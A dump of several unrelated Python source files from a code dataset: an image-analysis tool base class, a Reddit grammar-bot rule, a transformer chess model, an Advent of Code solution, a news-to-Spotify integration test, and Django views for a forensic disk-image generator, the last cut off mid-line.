\"\"\r\n\r\n @property\r\n def use_case(self):\r\n return [\"none\"]\r\n\r\n @property\r\n def result(self):\r\n return self._result\r\n\r\n @result.setter\r\n def result(self, value):\r\n self._result = value\r\n\r\n @property\r\n def result_name(self):\r\n return \"none\"\r\n\r\n @property\r\n def kwargs(self):\r\n return self._kwargs\r\n\r\n @property\r\n def lock_once_added(self):\r\n return False\r\n\r\n @property\r\n def file_name(self):\r\n if self.wrapper is not None:\r\n return f'\"{self.wrapper.file_path}\"'\r\n else:\r\n return \"{file}\"\r\n\r\n @property\r\n def package(self):\r\n return \"IPSO Phen\"\r\n\r\n @property\r\n def is_wip(self):\r\n return False\r\n\r\n @property\r\n def is_deprecated(self):\r\n return False\r\n\r\n @property\r\n def short_test_script(self):\r\n return self.is_wip or self.is_deprecated\r\n\r\n @property\r\n def needs_previous_mask(self):\r\n return False\r\n\r\n @property\r\n def input_type(self):\r\n if set(self.use_case).intersection(\r\n set(\r\n (\r\n ipc.ToolFamily.EXPOSURE_FIXING,\r\n ipc.ToolFamily.IMAGE_GENERATOR,\r\n ipc.ToolFamily.PRE_PROCESSING,\r\n ipc.ToolFamily.THRESHOLD,\r\n ipc.ToolFamily.WHITE_BALANCE,\r\n ipc.ToolFamily.ROI,\r\n )\r\n )\r\n ):\r\n return ipc.IO_IMAGE\r\n elif set(self.use_case).intersection(\r\n set((ipc.ToolFamily.FEATURE_EXTRACTION, ipc.ToolFamily.MASK_CLEANUP))\r\n ):\r\n return ipc.IO_MASK\r\n else:\r\n return ipc.IO_NONE\r\n\r\n @property\r\n def output_type(self):\r\n if set(self.use_case).intersection(\r\n set(\r\n (\r\n ipc.ToolFamily.EXPOSURE_FIXING,\r\n ipc.ToolFamily.PRE_PROCESSING,\r\n ipc.ToolFamily.WHITE_BALANCE,\r\n )\r\n )\r\n ):\r\n return ipc.IO_IMAGE\r\n elif set(self.use_case).intersection(\r\n set((ipc.ToolFamily.THRESHOLD, ipc.ToolFamily.MASK_CLEANUP))\r\n ):\r\n return ipc.IO_MASK\r\n elif set(self.use_case).intersection(set((ipc.ToolFamily.ROI,))):\r\n return ipc.IO_ROI\r\n elif set(self.use_case).intersection(\r\n set((ipc.ToolFamily.IMAGE_GENERATOR, ipc.ToolFamily.FEATURE_EXTRACTION))\r\n ):\r\n return ipc.IO_DATA\r\n elif set(self.use_case).intersection(set((ipc.ToolFamily.VISUALIZATION,))):\r\n return ipc.IO_IMAGE\r\n else:\r\n return ipc.IO_NONE\r\n\r\n @property\r\n def required_images(self):\r\n return []\r\n\r\n @property\r\n def skip_tests(self):\r\n return []\r\n\r\n\r\nfrom ipso_phen.ipapi.tools.common_functions import get_module_classes\r\nimport ipso_phen.ipapi.ipt as ipt_module\r\n\r\n\r\ndef build_tool_from_name(tool_name):\r\n # Build unique class list\r\n ipt_classes_list = get_module_classes(\r\n package=ipt_module,\r\n class_inherits_from=IptBase,\r\n remove_abstract=True,\r\n )\r\n\r\n for cls in ipt_classes_list:\r\n if cls.name == tool_name:\r\n return cls()\r\n else:\r\n return None\r\n","repo_name":"tpmp-inra/ipso_phen","sub_path":"ipso_phen/ipapi/base/ipt_abstract.py","file_name":"ipt_abstract.py","file_ext":"py","file_size_in_byte":77166,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"3304372643","text":"#!/usr/bin/env python\n\nSET_3 = set(['he', 'she', 'it'])\nSET_2 = set(['we', 'you', 'they'])\n\n\ndef do(self, cur):\n \"\"\"Keyword: supposed\n Src: ( doesn't|I don't| (? [aren't], didn't -> [wasn't/weren't]\n \"\"\"\n if not self.sequence.next_has_continuous(1):\n return\n if self.sequence.next_word(1).word_lower != 'to':\n return\n if not self.sequence.prev_has_continuous(2):\n return\n person = 2 # Note that 2nd person = plural\n prev_word_1 = self.sequence.prev_word(1)\n prev_word_2 = self.sequence.prev_word(2)\n if prev_word_1.word_lower == \"don't\":\n if prev_word_2.word_lower == \"i\":\n person = 1\n elif prev_word_2.word_lower in SET_3:\n person = 3\n # else: person = 2\n elif prev_word_1.word_lower == \"doesn't\":\n if prev_word_2.word_lower == \"i\":\n person = 1\n elif not prev_word_2.word_lower in SET_2:\n person = 3\n # else: person = 2\n elif prev_word_1.word_lower == \"didn't\":\n if prev_word_2.word_lower == \"i\" or prev_word_2.word_lower in SET_2:\n person = 4\n elif prev_word_2.word_lower in SET_3:\n person = 5\n else:\n return # unknown conjugation\n else:\n return\n self.matched('supposed-to')\n cur.mark_common()\n self.sequence.next_word(1).mark_common()\n if person == 1:\n # special: [I'm not] supposed to\n prev_word_2.replace(\"I'm\")\n prev_word_1.replace('not')\n elif person == 2:\n prev_word_1.replace(\"aren't\")\n self.rerun.add(11) # Rerun: your_are for \"you aren't\"\n elif person == 3:\n prev_word_1.replace(\"isn't\")\n elif person == 4:\n prev_word_1.replace(\"weren't\")\n else: # if person == 5:\n prev_word_1.replace(\"wasn't\")\n","repo_name":"vwww/bot-reddit-grammar_py","sub_path":"app/grammar/Corrections/supposed_to.py","file_name":"supposed_to.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"39124897002","text":"import torch\nfrom math import sqrt, log\nimport random\nfrom torch.nn import Module, Linear, Sequential\nfrom torch.nn import Embedding, LayerNorm\nfrom torch.nn import Sigmoid, ReLU, GELU\nfrom torch.distributions import Categorical\nimport numpy as np\nimport chess\nfrom .targets import maketargets, bytes_to_tensor\n\n\nclass CrossEntropyLoss(Module):\n def __init__(self, n_classes):\n super().__init__()\n self.n_classes = n_classes\n self.crossentropyloss = (\n torch.nn.CrossEntropyLoss(reduction='none'))\n\n def forward(self, x, y):\n return self.crossentropyloss(\n x.view(-1, self.n_classes),\n y.view(-1)).view(x.shape[:-1]\n )/log(2)\n\n\nclass Nonlinearity(Module):\n def __init__(self, **config):\n super().__init__()\n self.nonlinearity = config[\"nonlinearity\"]\n self.f = {\"sigmoid\": Sigmoid(), \"ReLU\": ReLU(),\n \"GELU\": GELU()}[self.nonlinearity]\n\n def forward(self, x):\n return self.f(x)\n\n\nclass MLP(Module):\n def __init__(self, **config):\n super().__init__()\n m = config[\"d_model\"]\n n = config[\"d_hidden\"]\n self.model = Sequential(\n Linear(m, n, bias=True),\n Nonlinearity(**config),\n Linear(n, m, bias=True))\n\n def forward(self, x):\n return self.model(x)\n\n\nclass Mask(Module):\n def __init__(self, **config):\n super().__init__()\n self.mask = config[\"mask\"]\n\n def forward(self, x):\n n, device = x.shape[-1], x.device\n if self.mask == \"none\":\n return x\n elif self.mask == \"causal\":\n return x+(1-1/torch.tril(torch.ones((n,n),\n device=device)))\n\n\nclass Attn(Module):\n def __init__(self, **config):\n super().__init__()\n d_model = self.d_model = config[\"d_model\"]\n d_k = self.d_k = config[\"d_k\"]\n d_v = self.d_v = config[\"d_v\"]\n n_heads = self.n_heads = config[\"n_heads\"]\n self.query_proj = Linear(d_model, d_k*n_heads)\n self.key_proj = Linear(d_model, d_k*n_heads)\n self.value_proj = Linear(d_model, d_v*n_heads)\n self.mask = Mask(**config)\n self.softmax = torch.nn.Softmax(dim=-1)\n self.linear = Linear(d_v*n_heads, d_model, bias=False)\n\n def forward(self, x):\n n_ctx = x.shape[-2]\n split_heads = lambda x: x.view(x.shape[:-1] +\n (self.n_heads, -1)).transpose(-2,\n -3).contiguous()\n merge_heads = lambda x: x.transpose(-2,\n -3).contiguous().view(x.shape[:-3] +\n (n_ctx, self.d_v*self.n_heads))\n (Q, K, V) = map(split_heads,(self.query_proj(x),\n self.key_proj(x), self.value_proj(x)))\n QKT = torch.matmul(Q/sqrt(self.d_k),\n K.transpose(-1,-2))\n U = self.softmax(self.mask(QKT))\n return self.linear(merge_heads(U@V))\n\n\nclass ResidualLayerNorm(Module):\n def __init__(self, layer, d_model):\n super().__init__()\n self.d_model = d_model\n self.layer = layer\n self.layernorm = LayerNorm(d_model)\n\n def forward(self, x):\n return self.layernorm(x+self.layer(x))\n\n\nclass TransformerLayer(Module):\n def __init__(self, **config):\n super().__init__()\n d_model = config[\"d_model\"]\n self.model = Sequential(\n ResidualLayerNorm(Attn(**config), d_model),\n ResidualLayerNorm(MLP(**config), d_model))\n\n def forward(self, x):\n return self.model(x)\n\n\nclass PositionalEncoding(Module):\n def __init__(self, **config):\n super().__init__()\n n_ctx = config[\"n_ctx\"]\n d_model = config[\"d_model\"]\n init_weights = 0.02*torch.randn(n_ctx, d_model)\n self.weight = torch.nn.Parameter(init_weights)\n\n def forward(self, x):\n n_ctx = x.shape[-2]\n return x + self.weight[:n_ctx]\n\n\nclass View(Module):\n def __init__(self, *suffix):\n super().__init__()\n self.suffix = suffix\n\n def forward(self, x):\n return x.view(*x.shape[:-1], *self.suffix)\n\n\nclass ChessLanguageModel(Module):\n def __init__(self, **config):\n super().__init__()\n self.config = {\n \"n_classes\": 256,\n \"n_ctx\": 4096,\n \"n_layers\": 3,\n \"plan\": [0,1,2],\n \"d_model\": 4096,\n \"d_hidden\": 4096,\n \"d_k\": 64,\n \"d_v\": 64,\n \"n_heads\": 64,\n \"nonlinearity\": \"GELU\",\n \"mask\": \"causal\",\n \"device\": \"cuda\"}\n self.config.update(config or dict())\n config = self.config\n n_ctx = config[\"n_ctx\"]\n n_layers = config[\"n_layers\"]\n plan = config[\"plan\"]\n d_model = config[\"d_model\"]\n d_hidden = config[\"d_hidden\"]\n device = config[\"device\"]\n make_layer = lambda: TransformerLayer(**config)\n self.layers = [make_layer() for _ in\n range(n_layers)]\n self.model = Sequential(\n Embedding(256, d_model),\n PositionalEncoding(**config),\n Sequential(*[self.layers[i] for i in plan]))\n self.seq_head = Linear(d_model, 256)\n self.visual_head = Sequential(Linear(d_model,\n 64*13), View(64, 13))\n self.action_head = Sequential(Linear(d_model,\n 256*2), View(256, 2))\n self.seq_crit = CrossEntropyLoss(256)\n self.visual_crit = CrossEntropyLoss(13)\n self.action_crit = CrossEntropyLoss(2)\n self.softmax = torch.nn.Softmax(dim=-1)\n self.to(device)\n\n def numel(self):\n return sum(p.numel() for p in self.parameters())\n\n def forward(self, game=None, seq_length=None, targets=None):\n (seq_input, seq_target, visual_target,\n action_target) = targets or maketargets(\n game, seq_length)\n # print('model forward shapes', seq_input.shape,\n # seq_target.shape,\n # visual_target.shape,\n # action_target.shape)\n model_output = self.model(seq_input)\n seq_output = self.seq_head(model_output)\n visual_output = self.visual_head(model_output)\n action_output = self.action_head(model_output)\n seq_output += 1 - 1/action_target\n seq_loss = self.seq_crit(seq_output, seq_target)\n visual_loss = self.visual_crit(visual_output, visual_target)\n action_loss = self.action_crit(action_output, action_target)\n return (seq_loss, visual_loss, action_loss)\n\n @torch.no_grad()\n def inference(self, gamestring):\n seq_input = bytes_to_tensor(gamestring)\n model_output = self.model(seq_input)\n seq_output = self.seq_head(model_output)\n visual_output = self.visual_head(model_output)\n action_output = self.action_head(model_output)\n seq_probs = self.softmax(seq_output)\n visual_probs = self.softmax(visual_output)\n action_probs = self.softmax(action_output)\n return (seq_probs, visual_probs, action_probs)\n\n def boardstring(self, game, temp=1.0):\n if game == \"\":\n gamestring = \"\\n\"\n else:\n gamestring = \"\\n\" + game.strip() + \" \"\n visual_probs = self.inference(gamestring)[1]\n probs = visual_probs[-1]\n result = \"\"\n pieces = \".KQNBRPkqnbrp\"\n for i in range(64):\n result += pieces[Categorical(probs=\n probs[i]**(1.0/temp)).sample().item()\n if temp > 0 else torch.argmax(probs[i])\n .item()]\n if i%8 == 7:\n result += \"\\n\"\n return result\n\n def move(self, game, temp=1.0):\n if game == \"\":\n gamestring = \"\\n\"\n else:\n gamestring = \"\\n\" + game.strip() + \" \"\n board = chess.Board()\n moves = game.split()\n for move in moves:\n board.push_san(move)\n legal = [board.san(move) for move in\n board.legal_moves]\n if len(legal) == 0:\n return None\n if len(legal) == 1:\n return legal[0]\n newmove = \"\"\n idx = 0\n while True:\n k = len(newmove)\n S = set(ord(move[k]) for move in legal\n if move.startswith(newmove) and\n len(move) > k)\n probs = self.inference(gamestring +\n newmove)[0].view(-1)[-256:] # just [-1]?\n for i in range(256):\n if i not in S:\n probs[i] = 0\n newmove += chr(Categorical(probs=probs**(\n 1.0/temp)).sample().item()\n if temp > 0 else torch.argmax(probs).item())\n left = [move for move in legal\n if move.startswith(newmove)]\n if len(left) == 0:\n return (random.choice(legal) if temp > 0\n else legal[0])\n if len(left) == 1:\n return left[0]\n","repo_name":"shaunharker/scholar","sub_path":"scholar/chess/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73925887159","text":"# Day 13 - Puzzle 2\n# What is the location of the last cart at the end of the first tick where it\n# is the only cart left?\n\nfrom part_1 import CartKind, TrackKind\n\n\ndef _tick(carts, grid):\n types = {\n TrackKind.EW: {\n CartKind.RIGHT: CartKind.RIGHT,\n CartKind.LEFT: CartKind.LEFT\n },\n TrackKind.NS: {\n CartKind.UP: CartKind.UP,\n CartKind.DOWN: CartKind.DOWN\n },\n TrackKind.NE_SW: {\n CartKind.RIGHT: CartKind.DOWN,\n CartKind.UP: CartKind.LEFT,\n CartKind.LEFT: CartKind.UP,\n CartKind.DOWN: CartKind.RIGHT\n },\n TrackKind.NW_SE: {\n CartKind.RIGHT: CartKind.UP,\n CartKind.DOWN: CartKind.LEFT,\n CartKind.LEFT: CartKind.DOWN,\n CartKind.UP: CartKind.RIGHT\n }\n }\n xr_directions = [CartKind.UP, CartKind.RIGHT, CartKind.DOWN, CartKind.LEFT]\n steps = 0\n while True:\n carts = sorted(\n [c for c in carts if not c['crashed']],\n key=lambda x: x['location']\n )\n\n if len(carts) == 1:\n return carts[0]['location']\n\n for cart in carts:\n cart_x, cart_y = cart['location']\n cart_type = cart['type']\n cart_dir = cart['direction']\n\n if cart_type == CartKind.LEFT:\n cart_x -= 1\n elif cart_type == CartKind.RIGHT:\n cart_x += 1\n elif cart_type == CartKind.UP:\n cart_y -= 1\n elif cart_type == CartKind.DOWN:\n cart_y += 1\n cart['location'] = (cart_x, cart_y)\n\n for c in carts:\n if (\n not c['crashed'] and\n cart['location'] == c['location'] and\n cart is not c\n ):\n cart['crashed'] = True\n c['crashed'] = True\n\n grid_loc_kind = TrackKind(grid[cart_y][cart_x])\n if grid_loc_kind == TrackKind.XR:\n if cart_dir == 0:\n cart['direction'] = 1\n cart['type'] = \\\n xr_directions[(xr_directions.index(cart_type) - 1) % 4]\n elif cart_dir == 1:\n cart['direction'] = 2\n elif cart_dir == 2:\n cart['direction'] = 0\n cart['type'] = \\\n xr_directions[(xr_directions.index(cart_type) + 1) % 4]\n else:\n cart['type'] = types[grid_loc_kind][cart_type]\n\n steps += 1\n return carts\n\n\ndef _create_state(file):\n carts = []\n grid = []\n with open(file) as f:\n for line in f:\n row = []\n row.extend([i for i in line.strip('\\n')])\n grid.append(row)\n\n for y, row in enumerate(grid):\n for x, cell in enumerate(row):\n if cell in '^v<>':\n if (\n CartKind(cell) == CartKind.UP or\n CartKind(cell) == CartKind.DOWN\n ):\n grid[y][x] = TrackKind.NS\n elif (\n CartKind(cell) == CartKind.LEFT or\n CartKind(cell) == CartKind.RIGHT\n ):\n grid[y][x] = TrackKind.EW\n\n cart_state = {\n 'location': (x, y),\n 'type': CartKind(cell),\n 'direction': 0,\n 'crashed': False\n }\n carts.append(cart_state)\n elif cell in '|-\\\\/+':\n grid[y][x] = TrackKind(cell)\n\n return carts, grid\n\n\n# Test\nTEST_CARTS, TEST_GRID = _create_state('./example-2.txt')\nassert(_tick(TEST_CARTS, TEST_GRID) == (6, 4))\n\n# Solution\nCARTS, GRID = _create_state('./day13-input.txt')\nprint(_tick(CARTS, GRID))\n","repo_name":"aos/advent","sub_path":"2018/day13/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74584916279","text":"#!/usr/bin/env python3\n\n# Integration tests for Sprint - all the functionality we\n# have implemented so far we try to test together after it\n# has been 'unit tested' and observe the results are consistent\n# with what we expect.\n\nimport re\nimport random\nimport time\nimport json\n\nimport sys\nsys.path.append(\"../../src\")\nimport news_interface as n_int\nimport watson_nlu_interface as w_int\nimport spotify_interface as s_int\n\ndef main():\n # tracks \n tracks = []\n si = s_int.spotify_interface(\"../../data/session_details.csv\")\n ni = n_int.news_interface(\"../../data/session_details.csv\")\n wi = w_int.watson_nlu_interface(\"../../data/session_details.csv\")\n\n # request token from spotify API\n si.request_token()\n \n # load excluded sources from the fixtures\n excl_sources = get_excluded_sources(\"fixtures/exclusion\")\n \n # get 10 breaking news excluding the BBC News source\n news = ni.get_breaking_news(10, excl_sources)\n # check we got news at all\n if len(news) != 0:\n # now, pipe those news descriptions into the watson nlu text analyzer\n for n in news:\n # store it in our list of term lists\n n_terms = wi.query_text_analyzer(n.headline)\n # tokenize it\n tokens = tokenize_terms(n_terms)\n # get best fit\n tracks += get_best_fit_track(si, tokens)\n # now, print out those terms\n pretty_print_tracks(tracks, news)\n # now print the Json\n print(\"JSON output:\")\n print(output_to_json(tracks, news))\n else:\n print(\"We received no news.\")\n\n # INTEGRATION TEST: make sure the outputted terms make sense in relation\n # to today's news by checking what the top 10 breaking news are today\n # in Great Britain, excepting BBC News articles.\n\n# this method takes a list of strings which may be sentences\n# or may have characters such as commas, dots, exclamation marks\n# and so on, and it returns a list of words without those characters\n# as 'tokens'\ndef tokenize_terms(terms):\n tokens = []\n delims = \" |\\-|,|\\.|:|!|\\?|;\"\n for t in terms:\n tokens += list(filter(None, re.split(delims, t)))\n # return tokens, but make sure they are unique (no duplicates)\n return list(dict.fromkeys(tokens))\n\n# this method returns a track which matches a token, or n\n# combination of tokens from Spotify\n# this assumes the Spotify Interface passed has already\n# requested a token\ndef get_best_fit_track(si, tokens):\n used = []\n # if the given tokens are None or of length 0,\n # return None\n if tokens is None or len(tokens) < 1:\n return None\n elif si is None:\n # if the spotify interface is None, return None\n return None\n # make sure we get a random seed\n random.seed(time.time())\n # progressively add terms from the tokens and stop where\n # we stop receiving tracks \n while True:\n # token we picked for this iteration\n curr = tokens[random.randint(0, len(tokens) - 1)]\n # remove the token we picked for this iteration\n tokens.remove(curr)\n # search with our previous tokens + new one\n track = si.search_tracks(used + [curr], 1)\n if len(track) != 0:\n # at least 1 track matches\n # incorporate our current token\n # to our set and remove it from tokens\n used.append(curr)\n if len(tokens) < 1:\n # we have no more tokens to try\n # so we quit\n break\n # the final answer will be a search with our 'used'\n # tokens\n return si.search_tracks(used, 1)\n\n# this method takes a list of Track objects\n# and prints their contents in an orderly\n# manner\ndef pretty_print_tracks(tracks, news = []):\n do_news = False\n if len(news) > 0:\n do_news = True\n for t in tracks:\n print(\"==============================================\")\n if do_news:\n art = news[tracks.index(t)]\n print(\"News used:\\nSource: {0}\\nHeadline: {1}\\n\".format(art.source, art.headline))\n print(\"Title:\\t\\t\", t.name)\n print(\"Artists:\\t\", \", \".join(t.artists))\n print(\"Duration:\\t\", t.duration_readable())\n print(\"Popularity:\\t\", \"{:02d}/100\".format(t.popularity))\n print(\"External URL:\\t\", t.external_url)\n prev_url = \"N/A\"\n if t.preview_url != \"\":\n prev_url = t.preview_url\n print(\"Preview URL:\\t\", prev_url)\n print(\"==============================================\")\n\n# this method gets each line item for\n# a given filename and returns that line stripped.\n# this is used to get the excluded sources\n# from a file, where each source to be excluded\n# from the news result is written in its own\n# line in a file\ndef get_excluded_sources(filename):\n out = []\n try:\n # try to open the file\n # reach each line and append\n # it to our list\n with open(filename) as f:\n for line in f:\n out.append(line.strip())\n except IOError:\n # there was an issue with I/O\n # report this to the user\n print(f\"Error trying to open file at {filename}\")\n # return our list, empty if there was an\n # issue with I/O\n return out\n# this method takes the tracks we\n# generated from the news headlines\n# or terms given by the user, along\n# with the news (if we used any)\n# and outputs all the data in JSON\n# format so the UX application\n# can better parse it and show\n# it in its interface\n#\n# this gets called only if the --json\n# option is activated by the caller\ndef output_to_json(tracks, news = []):\n # items which contain news used\n items = []\n # (if any) and track\n # did we get news?\n no_news = False\n if news == []:\n # no news\n no_news = True\n # go through each track\n for t in tracks:\n it = {}\n # if we do have news\n if not no_news:\n # get the corresponding news\n n = news[tracks.index(t)]\n it['news'] = news_to_dict(n)\n else:\n it['news'] = {}\n # now do the track\n it['track'] = track_to_dict(t)\n # add this item to our list\n # of items\n items.append(it)\n # once we are done with all tracks\n # and news, return the result\n # as json\n try:\n # build json string\n json_data = json.dumps(items)\n # all good, return json data\n return json_data\n except:\n # if anything went wrong\n return None\n\n# this method takes a track object and\n# turns it in to a dictionary\n# where each object data member\n# is a key:value pair. The\n# duration_readable(...) method from\n# the Track object is called and the\n# outputted string is put into another\n# key:value pair\ndef track_to_dict(track):\n if track is None:\n return None\n else:\n d = {\"artists\" : track.artists,\n \"duration\" : track.duration_readable(),\n \"name\" : track.name,\n \"popularity\" : track.popularity,\n \"preview_url\" : track.preview_url,\n \"external_url\" : track.external_url}\n return d\n\n# this method takes a News object\n# and returns a dictionary where\n# its object data members are\n# key:value pairs\ndef news_to_dict(_news):\n if _news is None:\n return None\n else:\n d = {\"headline\" : _news.headline,\n \"source\" : _news.source}\n return d\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"Software-Engineering-Group-6/NewsSpotify","sub_path":"tests/integration/s3_intgr_main.py","file_name":"s3_intgr_main.py","file_ext":"py","file_size_in_byte":7446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23360095418","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.views import generic\n\nfrom django.db import DatabaseError\nimport sys\nimport datetime\nfrom django.core.context_processors import csrf\nfrom django.shortcuts import render, get_object_or_404, render_to_response\nfrom ui.forms import RequestCaseForm,RequestWebhistoryForm\nfrom ui.uitools import errlog\n\nfrom ui.models import Case, TrivialFileItem, User, FileSystem, HidingMethod\nfrom ui.models import SecretFileItem, SecretStrategy, Image, Webhistory\nfrom ui.models import HiddenObject, TrivialObject, WebMethod\n\nclass Selection():\n selected = 0\n \n @staticmethod\n def getSelection():\n return Selection.selected\n \n @staticmethod\n def setSelection(selection):\n Selection.selected = selection\n \n \ndef getFileType(content):\n \n __document_list = [\"application/pdf\",\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\",\n \"application/msword\",\"application/vnd.oasis.opendocument.text\",\n \"application/vnd.openxmlformats-officedocument.presentationml.presentation\",\n \"application/rtf\",\n \"application/vnd.ms-excel\",\n \"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"]\n __application_list = [\"application/octet-stream\", \"application/x-shellscript\",\n \"application/x-ms-dos-executable\",\"application/x-java-archive\"]\n __archive_list = [\"application/zip\",\"application/x-gzip\",\"application/x-rar\"]\n __text_list = [\"text/plain\"]\n __audio_list = [\"audio/mpeg\"]\n \n if content.startswith(\"image/\"):\n return 0\n if content in __document_list:\n return 1\n if content in __application_list:\n return 6\n if content in __archive_list:\n return 9\n if content.startswith(\"text/\"):\n return 8\n if content.startswith(\"audio/\"):\n return 4\n if content.startswith(\"video/\"):\n return 5\n \n return 7\n\ndef initDbView(request):\n foo = User.objects.all()\n if len(foo) == 0:\n u1 = User(name=\"forge\", role=0, valid_until=\"2013-12-31\")\n u1.save()\n f = FileSystem(name=\"NTFS\", pythonpath=\"ntfsparser.ntfsc\",\n pythoncreatecommand=\"NTFSCreateImage\", \n fsclass = \"NTFSC\")\n f.save()\n f = FileSystem(name=\"FAT12\", pythonpath=\"fat.fat\",\n pythoncreatecommand=\"FAT12CreateImage\", \n fsclass = \"FATC\")\n f.save()\n f = FileSystem(name=\"FAT16\", pythonpath=\"fat.fat\",\n pythoncreatecommand=\"FAT16CreateImage\", \n fsclass = \"FATC\")\n f.save()\n f = FileSystem(name=\"FAT32\", pythonpath=\"fat.fat\",\n pythoncreatecommand=\"FAT32CreateImage\", \n fsclass = \"FATC\")\n f.save()\n f = FileSystem(name=\"FAT\", pythonpath=\"fat.fat\",\n pythoncreatecommand=\"FATGenericCreateImage\", \n fsclass = \"FATC\")\n f.save()\n h = HidingMethod(name=\"ADS\", priority = 2, pythonpath=\"hiding.ads\",\n pythonhideclass = \"AlternateDataStream\")\n\n h.save()\n h = HidingMethod(name=\"Deleted file\", priority = 3, \n pythonpath=\"hiding.deletedfile\", \n pythonhideclass = \"DeletedFile\")\n h.save()\n h = HidingMethod(name=\"Extension change\", priority = 2, \n pythonpath=\"hiding.extensionchange\", \n pythonhideclass=\"ExtensionChange\")\n h.save()\n h = HidingMethod(name=\"Concatenate\", priority = 2, \n pythonpath=\"hiding.concatenate\", \n pythonhideclass=\"ConcatenateFile\")\n h.save()\n h = HidingMethod(name=\"File slack\", priority = 5, \n pythonpath=\"hiding.fileslack\", \n pythonhideclass=\"FileSlack\")\n h.save()\n h = HidingMethod(name=\"Steganography\", priority = 1, \n pythonpath=\"hiding.steganography\", \n pythonhideclass=\"Steganography\")\n h.save()\n h = HidingMethod(name=\"Not hidden\", priority = 4, \n pythonpath=\"hiding.donothide\", \n pythonhideclass=\"DoNotHideFile\")\n h.save()\n h = HidingMethod(name=\"Unallocated space\", priority = 5, \n pythonpath=\"hiding.unallocated_space\", \n pythonhideclass=\"UnallocatedSpace\")\n h.save()\n wmh = WebMethod(name=\"URL and search\", priority = 1, \n pythonpath=\"browserhistory.bhistory\", \n pythonhideclass=\"BrowserHistory\")\n wmh.save()\n c=Case(name=\"casetest\", owner=User.objects.get(name=\"forge\"), \n date_created=\"2013-06-01\", \n size=\"10M\", amount=3, garbage=False,fsparam1=8, weekvariance=26, \n filesystem= FileSystem.objects.get(name=\"NTFS\"),\n roottime=datetime.datetime(2010,7,16,3,42,42))\n c.save()\n c.trivialstrategy_set.create(type=0, quantity=2, exact = True, \n path=\"/holiday\",\n dirtime = datetime.datetime(2010,12,24,17,0,0))\n c.trivialstrategy_set.create(type=1, quantity=2, exact = True, path=\"/doc\",\n dirtime = datetime.datetime(2011,2,28,9,30,15))\n c.secretstrategy_set.create(method=h, group = 1, filetime = datetime.datetime(2008,5,25,10,42,32), amount=1, placeall=False)\n c.save()\n \n return HttpResponse(\"ok\")\n\ndef IndexView(request):\n \n if request.method == \"POST\":\n click = request.POST.getlist(\"click2\")\n if not click:\n sys.stderr.write(\"no click\")\n else:\n Selection.setSelection(int(click[0]))\n __tmp, = Case.objects.filter(pk=Selection.getSelection())\n sys.stderr.write(__tmp.owner.name)\n \n table = Case.objects.all()\n return render(request, \"ui/main.html\", {'active_cases': table, 'selected_case': __tmp}) \n else:\n __tmp = None\n table = Case.objects.all()\n return render(request, \"ui/main.html\", {'active_cases': table, 'selected_case': __tmp}) \n\ndef trivial_file_view(request):\n \n if request.method == \"POST\":\n \"\"\"click = request.POST.getlist(\"click2\")\n if not click:\n sys.stderr.write(\"no click\")\n else:\n Selection.setSelection(int(click[0]))\n __tmp, = Case.objects.filter(pk=Selection.getSelection())\n sys.stderr.write(__tmp.owner.name)\n \n table = Case.objects.all()\"\"\"\n return render(request, \"ui/files.html\", {\"cfunction\": \"posttrivialfile\", \"instruction\": \"Drag and drop trivial files here\"}) \n else:\n\n return render(request, \"ui/files.html\", {\"cfunction\": \"posttrivialfile\", \"instruction\": \"Drag and drop trivial files here\"}) \n\ndef post_trivial_view(request):\n if request.method == \"POST\":\n \n tfile = request.FILES['file']\n ft = getFileType(tfile.content_type)\n if ft == 7:\n print >>sys.stderr, tfile.content_type\n \n \n\n t = TrivialFileItem(name=tfile.name, type=ft,file=tfile)\n try:\n t.save()\n except DatabaseError:\n try:\n t.save()\n except DatabaseError:\n pass\n \n \n return render(request, \"ui/files.html\", {\"cfunction\": \"posttrivialfile\", \"instruction\": \"Drag and drop trivial files here\"}) \n\ndef secret_file_view(request):\n return render(request, \"ui/files.html\", {\"cfunction\": \"postsecretfile\", \"instruction\": \"Drag and drop secret files here\"})\ndef post_secret_view(request):\n if request.method == \"POST\":\n \n sfile = request.FILES['file']\n\n t = SecretFileItem(name=sfile.name, file = sfile, group = 0)\n try:\n t.save()\n except DatabaseError:\n try:\n t.save()\n except DatabaseError:\n errlog(\"can't post secret file\")\n pass\n \n \n return render(request, \"ui/files.html\", {\"cfunction\": \"postsecretfile\", \"instruction\": \"Drag and drop secret files here\"}) \n\n\n \n \ndef imageView(request, iid=-1):\n if request.method == \"POST\":\n \n click = request.POST.getlist(\"click2\")\n if click:\n Selection.setSelection(int(click[0]))\n return HttpResponseRedirect(\"/ui/images\"+\"/\"+click[0])\n form = RequestCaseForm(request.POST)\n\n if u'create' in request.POST:\n if iid == -1:\n return HttpResponseRedirect(\"/ui/images\")\n case = Case.objects.get(pk=iid)\n if not case:\n return HttpResponseRedirect(\"/ui/images\")\n qres = case.processCase()\n if qres:\n return render(request, \"ui/creationreport.html\", \n {\"case\":case, \"success\": qres[0], \"notsuccess\": qres[1]})\n else:\n return HttpResponseRedirect(\"/ui/images\")\n return HttpResponseRedirect(\"/ui/images\")\n else:\n table = Case.objects.all() \n if iid == -1: \n form = RequestCaseForm()\n else:\n try:\n c, = Case.objects.filter(pk=iid)\n form = RequestCaseForm(instance=c)\n except ValueError:\n return HttpResponseRedirect(\"/ui/images\")\n \n return render(request, \"ui/images.html\", {\"form\": form, \"active_cases\": table})\n\ndef webhistoryView(request, iid=-1):\n if request.method == \"POST\":\n \n click = request.POST.getlist(\"click2\")\n if click:\n Selection.setSelection(int(click[0]))\n return HttpResponseRedirect(\"/ui/webhistory\"+\"/\"+click[0])\n form = RequestWebhistoryForm(request.POST)\n if u'create' in 